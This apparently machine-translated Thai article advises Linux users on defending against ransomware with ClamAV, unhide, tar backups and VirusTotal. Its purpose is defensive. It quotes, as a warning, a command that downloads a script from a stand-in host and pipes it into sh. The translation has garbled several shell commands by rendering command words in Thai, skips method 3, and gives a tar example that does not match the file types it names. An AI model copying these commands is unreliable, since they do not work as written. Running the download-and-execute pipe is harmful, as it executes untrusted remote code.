Ransomware เป็นหนึ่งในปัญหาที่คุกคามมากขึ้นในโลกของการรักษาความปลอดภัยเครือข่ายในปัจจุบัน เป็นเรื่องน่ากลัวที่จะคิดว่ามีคนจับข้อมูลของคุณเป็นตัวประกัน การติดไวรัสแรนซัมแวร์บางตัวเข้ารหัสข้อมูลทั้งหมดในไดรฟ์ข้อมูลเฉพาะและบุคคลที่อยู่เบื้องหลังต้องการเงินจำนวนหนึ่งก่อนที่พวกเขาจะตกลงที่จะปล่อยคีย์ที่จำเป็นในการปลดล็อกข้อมูลดังกล่าว โดยเฉพาะอย่างยิ่งสำหรับผู้ที่มีเงินจำนวนมากในการลงทุนในข้อมูลของตน อย่างไรก็ตามมีข่าวดีเล็กน้อยสำหรับผู้ใช้ Linux
ภายใต้สถานการณ์ส่วนใหญ่โค้ด ransomware ยากที่จะควบคุมอะไรก็ได้ที่ไม่ใช่แค่โฮมไดเร็กทอรีของผู้ใช้ โปรแกรมเหล่านี้ไม่มีสิทธิ์ในการทิ้งการติดตั้งทั้งหมด นี่คือสาเหตุที่ลินุกซ์ ransomware เป็นปัญหาบนเซิร์ฟเวอร์ที่ผู้ให้บริการเข้าถึงรูทได้ตลอดเวลา Ransomware ไม่ควรเป็นปัญหาสำหรับผู้ใช้ Linux มากนักและมีหลายขั้นตอนที่ต้องดำเนินการเพื่อป้องกันไม่ให้เกิดขึ้นกับคุณ
วิธีที่ 1: การป้องกันการโจมตีแบบ BashCrypt
BasyCrypt เป็นเครื่องพิสูจน์ชิ้นส่วนแนวคิดของ ransomware ที่พิสูจน์แล้วว่ามีความเป็นไปได้ที่จะติดโครงสร้างเซิร์ฟเวอร์ด้วยรหัสที่เป็นอันตรายประเภทนี้ สิ่งนี้เป็นพื้นฐานสำหรับสิ่งที่แพ็คเกจลินุกซ์แรนซัมแวร์อาจมีลักษณะ แม้ว่าปัจจุบันจะเป็นเรื่องแปลก แต่มาตรการป้องกันสามัญสำนึกประเภทเดียวกันสำหรับผู้ดูแลระบบเซิร์ฟเวอร์ของแพลตฟอร์มอื่น ๆ ก็ใช้ได้เช่นกันที่นี่ ปัญหาคือในสภาพแวดล้อมระดับองค์กรอาจมีผู้คนจำนวนมากที่ใช้ระบบโฮสต์
หากคุณใช้เซิร์ฟเวอร์อีเมลอาจเป็นเรื่องยากมากที่จะป้องกันไม่ให้ผู้อื่นทำสิ่งที่โง่เขลา พยายามเตือนทุกคนอย่าเปิดไฟล์แนบที่พวกเขาไม่แน่ใจและมัลแวร์จะสแกนทุกสิ่งที่เป็นปัญหาเสมอ อีกสิ่งหนึ่งที่สามารถช่วยป้องกันการโจมตีประเภทนี้ได้มาจากการดูวิธีการติดตั้งไบนารีด้วย wget โดยปกติเซิร์ฟเวอร์อีเมลของคุณอาจไม่มีสภาพแวดล้อมเดสก์ท็อปโดยสิ้นเชิงและคุณอาจใช้ wget, apt-get, yum หรือ pacman เพื่อจัดการแพ็คเกจที่กำลังจะมาถึง เป็นสิ่งสำคัญมากในการดูว่าที่เก็บใดที่ใช้ในการติดตั้งเหล่านี้ บางครั้งคุณจะเห็นคำสั่งที่ต้องการให้คุณดำเนินการบางอย่างเช่น wget http: //www.thisisaprettybadcoderepo.webs/ -O- | sh หรืออาจอยู่ภายในเชลล์สคริปต์ ไม่ว่าจะด้วยวิธีใดก็ตามอย่าเรียกใช้หากคุณไม่รู้ว่าที่เก็บนั้นมีไว้เพื่ออะไร
วิธีที่ 2: การติดตั้งแพ็คเกจสแกนเนอร์
มีเทคโนโลยีการสแกนมัลแวร์แบบโอเพนซอร์สหลายชิ้น ClamAV เป็นที่รู้จักมากที่สุดและคุณสามารถติดตั้งบนการแจกแจงแบบ apt โดยใช้:
sudo apt-get ติดตั้ง clamav
เมื่อติดตั้งแล้ว man clamav ควรอธิบายการใช้งานเป็นภาษาธรรมดา โปรดทราบว่าแม้ว่าจะสามารถสแกนและลบไฟล์ที่ติดไวรัสได้ แต่ก็ไม่สามารถลบรหัสที่ติดไวรัสออกจากไฟล์ได้ นี่เป็นสถานการณ์ทั้งหมดหรือไม่มีอะไรเลย
มีเครื่องสแกนเครื่องที่สองที่คุณอาจไม่คุ้นเคย แต่จะมีประโยชน์หากกระบวนการที่ซ่อนอยู่เป็นสิ่งที่ทำให้คุณกลัว อีกครั้งหากคุณใช้การกระจายตาม apt ให้ใช้คำสั่งนี้เพื่อติดตั้งเครื่องสแกนยกเลิกการซ่อน:
sudo apt-get install unhide
เมื่อติดตั้งแล้วให้พิมพ์:
sudo ยกเลิกการซ่อน sys
การดำเนินการนี้จะทำการสแกนระบบของคุณอย่างสมบูรณ์เพื่อหากระบวนการที่ซ่อนอยู่
วิธีที่ 4: การทำความสะอาดข้อมูลสำรองในมือ
แม้ว่าสิ่งนี้ไม่ควรเป็นปัญหาเนื่องจากทุกคนควรสำรองข้อมูลอยู่เสมอ แต่การสำรองข้อมูลที่ดีจะสามารถกำจัดแรนซัมแวร์ได้ทันที ransomware บนแพลตฟอร์ม Linux มีแนวโน้มที่จะโจมตีไฟล์ที่มีนามสกุลเฉพาะสำหรับแพลตฟอร์มการพัฒนาเว็บ ซึ่งหมายความว่าหากคุณมีโค้ด. php, .xml หรือ. js จำนวนมากอยู่รอบ ๆ คุณจะต้องสำรองข้อมูลนี้เป็นพิเศษ พิจารณาโค้ดบรรทัดต่อไปนี้:
tar -cf backups.tar $ (ค้นหา - ชื่อ“ * .ruby” - หรือ - ชื่อ“ * .html”)
สิ่งนี้ควรสร้างไฟล์เก็บถาวรเทปขนาดใหญ่ของทุกไฟล์ที่มีนามสกุล. ruby และ. html ภายในโครงสร้างไฟล์ จากนั้นสามารถย้ายไปยังไดเร็กทอรีย่อยชั่วคราวอื่นสำหรับการแยกเพื่อให้แน่ใจว่าการสร้างทำงานอย่างถูกต้อง
ที่เก็บเทปนี้สามารถและควรย้ายไปยังไดรฟ์ข้อมูลภายนอก แน่นอนคุณสามารถใช้การบีบอัด. bz2, .gz หรือ. xv ก่อนที่จะทำเช่นนั้น คุณอาจต้องการสร้างการสำรองข้อมูลแบบมิเรอร์โดยคัดลอกไปยังไดรฟ์ข้อมูลที่แตกต่างกันสองไดรฟ์ข้อมูล
วิธีที่ 5: การใช้เครื่องสแกนบนเว็บ
บางทีคุณอาจดาวน์โหลดแพ็คเกจ RPM หรือ DEB จากไซต์ที่สัญญาว่าจะมีซอฟต์แวร์ที่มีประโยชน์ ซอฟต์แวร์ยังเผยแพร่ผ่าน 7z หรือไฟล์ tar ที่บีบอัดเช่นกัน ผู้ใช้มือถืออาจได้รับแพ็กเกจ Android ในรูปแบบ APK การสแกนสิ่งเหล่านี้ทำได้ง่ายด้วยเครื่องมือในเบราว์เซอร์ของคุณ ชี้ไปที่ https://www.virustotal.com/ และเมื่อโหลดหน้าเว็บแล้วให้กดปุ่ม“ เลือกไฟล์” ก่อนที่คุณจะอัปโหลดโปรดทราบว่านี่เป็นเซิร์ฟเวอร์สาธารณะ แม้ว่าจะปลอดภัยและดำเนินการโดย Alphabet Inc แต่ก็โอนไฟล์แบบสาธารณะซึ่งอาจเป็นปัญหาในสภาพแวดล้อมที่มีความปลอดภัยสูง นอกจากนี้ยัง จำกัด ไฟล์ที่ 128 MB
เลือกไฟล์ของคุณในช่องที่ปรากฏขึ้นและเลือกเปิด ชื่อไฟล์จะปรากฏในบรรทัดถัดจากปุ่มหลังจากกล่องหายไป
คลิกที่เครื่องหมาย 'Scan it!' สีน้ำเงินขนาดใหญ่ ปุ่ม. คุณจะเห็นช่องอื่นที่ระบุว่าระบบกำลังอัปโหลดไฟล์ของคุณ
หากมีผู้ตรวจสอบไฟล์ก่อนหน้านี้ระบบจะแจ้งให้คุณทราบถึงรายงานก่อนหน้านี้ โดยจะรับรู้สิ่งนี้โดยอิงจากผลรวม SHA256 ซึ่งทำงานในลักษณะเดียวกับเครื่องมือบรรทัดคำสั่งของ Linux ที่คุณคุ้นเคย มิฉะนั้นจะเรียกใช้การสแกนแบบเต็มด้วยโปรแกรมสแกนที่แตกต่างกัน 53 โปรแกรม บางส่วนอาจหมดเวลาเมื่อเรียกใช้ไฟล์และผลลัพธ์เหล่านี้สามารถละเว้นได้อย่างปลอดภัย
บางโปรแกรมอาจให้ผลลัพธ์ที่แตกต่างจากโปรแกรมอื่น ๆ ดังนั้นจึงเป็นเรื่องง่ายที่จะกำจัดผลบวกปลอมด้วยระบบนี้ ส่วนที่ดีที่สุดคือการทำงานระหว่างแพลตฟอร์มต่างๆซึ่งทำให้น่าสนใจเท่า ๆ กันไม่ว่าคุณจะมีการแจกจ่ายแบบใดในอุปกรณ์ต่างๆ นอกจากนี้ยังใช้งานได้ดีจากการแจกแจงอุปกรณ์เคลื่อนที่เช่น Android ซึ่งเป็นอีกสาเหตุหนึ่งที่เป็นวิธีที่ดีในการตรวจสอบแพ็คเกจ APK ก่อนใช้งาน
อ่าน 4 นาที
